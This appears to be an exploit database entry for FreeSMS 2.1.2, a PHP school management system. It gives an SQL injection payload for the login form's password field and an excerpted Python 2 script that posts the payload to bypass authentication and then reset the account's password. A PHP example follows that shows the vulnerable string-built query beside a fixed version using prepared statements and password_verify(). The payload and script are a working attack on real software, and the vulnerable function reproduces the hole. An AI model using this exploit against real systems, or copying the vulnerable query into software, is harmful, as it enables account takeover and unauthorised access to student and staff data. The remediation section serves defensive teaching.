Exploits / Vulnerability Discovered: 2019-04-04 | Type: webapps | Platform: php
# Exploit Title: FreeSMS 2.1.2 - Authentication Bypass
# Date: 2019-04-03
# Exploit Author: Yilmaz Degirmenci
# Vendor Homepage: https://freesms.sourceforge.io/
# Software Link: https://sourceforge.net/projects/freesms/
# Version: v2.1.2
# Category: Webapps
# Tested on: LAMPP for Linux
# Software Description: FreeSMS is a PHP based application to manage an educational facility
# of teachers and students alike. It is a teacher and student management system providing marketing,
# registration, course management, attendance and a student evaluation system.
# ==================================================================
# The "password" parameter has a boolean-based blind SQL injection vulnerability.
# The login panel can be bypassed if the user name is known.
# SQLDork: pass") RLIKE (SELECT (CASE WHEN (4404=4404) THEN 0x61646d696e74 ELSE 0x28 END)) AND ("WpaN"="WpaN
# The exploit allows the creation of a new password on the target.
# Python 2 script (print statements). url, headers, uname and npass are set earlier in
# the original script and are not part of this excerpt.
import sys
import requests

# Login form fields: the "password" field carries the injection string quoted above.
data = {"username": ""+uname+"", "password": "pass\") RLIKE (SELECT (CASE WHEN (4404=4404) THEN 0x61646d696e74 ELSE 0x28 END)) AND (\"WpaN\"=\"WpaN", "context": "ou=Don Mills,ou=Toronto,ou=Ontario,ou=Canada,o=CRC World", "login": "login"}
bp = bypass = requests.post(url, headers=headers, data=data)
if bp.status_code == 200:
    print "Authentication bypass was successful!"
    print "Trying to change password..."
else:
    print "Something went wrong. You should try manual exploitation"
    sys.exit()
# p is the response to the password-change request, which is not included in this excerpt.
if p.status_code == 200:
    print "New password successfully created! New Password: "+npass+""
else:
    print "Something went wrong. You should try manual exploitation"
    sys.exit()
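As an added illustration of the fix, and not FreeSMS's own code, the hypothetical PHP login handler below places the string-built query shape that the payload above exploits next to a corrected version that binds the user name with a PDO prepared statement and checks the password with password_verify(). The table and column names, and the $pdo connection, are assumptions.

```php
<?php
// Hypothetical login handler (added example, not FreeSMS code).
// Assumed schema: users(id, username, password_hash). $pdo is an open PDO connection.

// VULNERABLE: the submitted password is spliced into the SQL text. A value such as
//   pass") RLIKE (SELECT ...) AND ("WpaN"="WpaN
// closes the quoted string and the parenthesis, then appends its own boolean
// expression, so the WHERE clause no longer depends on the real password.
function loginVulnerable(PDO $pdo, string $username, string $password): bool
{
    $sql = 'SELECT id FROM users WHERE (username="' . $username
         . '" AND password="' . $password . '")';
    return $pdo->query($sql)->fetch(PDO::FETCH_ASSOC) !== false;
}

// FIXED: the user name is passed as a bound parameter, so the database receives it
// as data rather than SQL text, and the password never appears in a query at all;
// it is compared against the stored hash with password_verify().
function loginFixed(PDO $pdo, string $username, string $password): bool
{
    $stmt = $pdo->prepare('SELECT id, password_hash FROM users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return false; // unknown user
    }
    return password_verify($password, $row['password_hash']);
}
```

With loginFixed(), the injection string above is simply a (wrong) password candidate, and the query's result set depends only on the user name.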